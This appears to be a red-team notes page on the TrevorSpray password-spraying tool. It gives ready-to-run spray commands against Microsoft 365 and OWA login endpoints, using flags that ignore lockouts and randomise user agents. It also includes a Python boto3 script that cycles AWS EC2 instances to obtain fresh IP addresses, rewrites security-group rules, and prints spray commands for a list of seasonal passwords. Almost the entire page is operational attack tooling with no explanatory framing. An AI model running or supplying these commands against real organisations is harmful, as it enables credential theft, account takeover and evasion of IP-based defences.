TrevorSpray
TrevorSpray
O365:
trevorspray --users 'USERS.txt' -p PASSWORD -i s.pem --delay 60 --lockout-delay 50 --random-useragent --jitter 30 -m msol --ignore-lockouts --ssh USER@HOST USER@HOST OWA:
trevorspray -u ../azurehound/users.txt -p Summer22 -m owa --url https://autodiscover.DOMAIN.co.uk/autodiscover/autodiscover.xmlUpdate IPs:
import boto3, os, time
import numpy as np
region='eu-west-2'
access_key_id='ID_KEY'
access_key='ACCESS_KEY'
client = boto3.client('ec2', region_name=region, aws_access_key_id=access_key_id, aws_secret_access_key=access_key)
def instances():
started_instance_ids = []
stopped_instance_ids = []
instance_ips = []
tag_name = 'TREVOR*'
instances = client.describe_instances(Filters=[{'Name': 'tag:Name','Values': [tag_name]}])
ids = instances['Reservations']
for instances in ids:
for instance in instances['Instances']:
if instance['State']['Name'] == 'stopped':
stopped_instance_ids.append(instance['InstanceId'])
if instance['State']['Name'] == 'running':
started_instance_ids.append(instance['InstanceId'])
instance_ips.append(instance['PublicIpAddress'])
return stopped_instance_ids, started_instance_ids, instance_ips
def stop(instance_id):
stop = client.stop_instances(InstanceIds=[instance_id])
return stop['StoppingInstances'][0]['CurrentState']['Name']
def start(instance_id):
start = client.start_instances(InstanceIds=[instance_id])
return start['StartingInstances'][0]['CurrentState']['Name']
def update_sec_group(old_ips, new_ips):
client = boto3.client('ec2', region_name=region, aws_access_key_id=access_key_id, aws_secret_access_key=access_key)
# Get sec group ID
group_information = client.describe_security_groups(Filters=[{'Name': 'group-name','Values': ['launch-wizard-18']}])
group_id = group_information['SecurityGroups'][0]['GroupId']
FromPort = 22
ToPort = 22
IpProtocol = 'tcp'
# remove old
for IP in old_ips:
try:
client.revoke_security_group_ingress(GroupId=group_id,IpPermissions=[{'FromPort': FromPort,'IpProtocol':
IpProtocol,'ToPort': ToPort, 'IpRanges':[{'CidrIp': f'{IP}/32'}]}], DryRun=False)
except Exception as e:
print(f'Error removing old rule: {e}')
# add new
for IP in new_ips:
try:
client.authorize_security_group_ingress(GroupId=group_id,IpPermissions=[{'FromPort': FromPort,'IpProtocol':
IpProtocol,'ToPort': ToPort, 'IpRanges':[{'CidrIp': f'{IP}/32'}]}], DryRun=False)
except Exception as e:
print(f'Error adding new rule: {e}')
def banner():
os.system('cls' if os.name == 'nt' else 'clear')
print("""
bbbbbbbb dddddddd
b::::::b d::::::d
b::::::b d::::::d
b::::::b d::::::d
b:::::b d:::::d
b:::::bbbbbbbbb rrrrr rrrrrrrrr eeeeeeeeeeee aaaaaaaaaaaaa ddddddddd:::::d
b::::::::::::::bb r::::rrr:::::::::r ee::::::::::::ee a::::::::::::a dd::::::::::::::d
b::::::::::::::::b r:::::::::::::::::r e::::::eeeee:::::eeaaaaaaaaa:::::a d::::::::::::::::d
b:::::bbbbb:::::::brr::::::rrrrr::::::re::::::e e:::::e a::::ad:::::::ddddd:::::d
b:::::b b::::::b r:::::r r:::::re:::::::eeeee::::::e aaaaaaa:::::ad::::::d d:::::d
b:::::b b:::::b r:::::r rrrrrrre:::::::::::::::::e aa::::::::::::ad:::::d d:::::d
b:::::b b:::::b r:::::r e::::::eeeeeeeeeee a::::aaaa::::::ad:::::d d:::::d
b:::::b b:::::b r:::::r e:::::::e a::::a a:::::ad:::::d d:::::d
b:::::bbbbbb::::::b r:::::r e::::::::e a::::a a:::::ad::::::ddddd::::::dd
b::::::::::::::::b r:::::r e::::::::eeeeeeeea:::::aaaa::::::a d:::::::::::::::::d
b:::::::::::::::b r:::::r ee:::::::::::::e a::::::::::aa:::a d:::::::::ddd::::d
bbbbbbbbbbbbbbbb rrrrrrr eeeeeeeeeeeeee aaaaaaaaaa aaaa ddddddddd ddddd
[*] Now go get that bread
""")
if __name__ == '__main__':
banner()
stopped_instances, started_instances, old_ips = instances()
print(f'[+] identified {len(stopped_instances)} stopped instances and {len(started_instances)} currently running')
decide = input('do you want to restart?\n')
if 'y' in decide.lower():
print(f'[+] current IPs: {old_ips}')
for InstanceId in started_instances:
stopping = stop(InstanceId)
while stopping == 'stopping':
print(f'[+] stopping instance {InstanceId}, current state ')
print(f'{stopping:}', end="\r")
time.sleep(2)
stopping = stop(InstanceId)
if InstanceId not in stopped_instances:
time.sleep(2)
stopped_instances.append(InstanceId)
for InstanceId in stopped_instances:
starting = start(InstanceId)
while starting == 'pending':
print(f'[+] starting instance {InstanceId} current state:')
print(f'{starting:}', end="\r")
time.sleep(2)
starting = start(InstanceId)
stopped_instances, started_instances, new_ips = instances()
print(f'[+] got the following IPs: {new_ips}')
if new_ips:
update_sec_group(old_ips, new_ips)
print(f'[+] Added new ips to sec group')
passwords = ['Summer22', 'Summer2022', 'Winter2022', 'Winter22', 'Spring2022', 'Spring22']
x = 0
i = 1
new_list = []
new_hosts = []
for instance in new_ips:
print(f'new ip len: {len(new_ips)}')
print(f'new list len: {len(new_list)}')
new_list.append(f'ubuntu@{instance}')
x = 0
for list in np.array_split(new_list, len(passwords)):
print(f"trevorspray --users 'passenum.txt' -p '{passwords[x]}' -i s.pem --delay 60 --lockout-delay 50 --random-useragent --jitter 30 -m msol --ignore-lockouts --ssh {' '.join(new_list)}\\n\"")
x = x + 1
print(f'Goodluck...')
exit()
i = i + 1
else:
print(f'Error, no new ips generated...')Last updated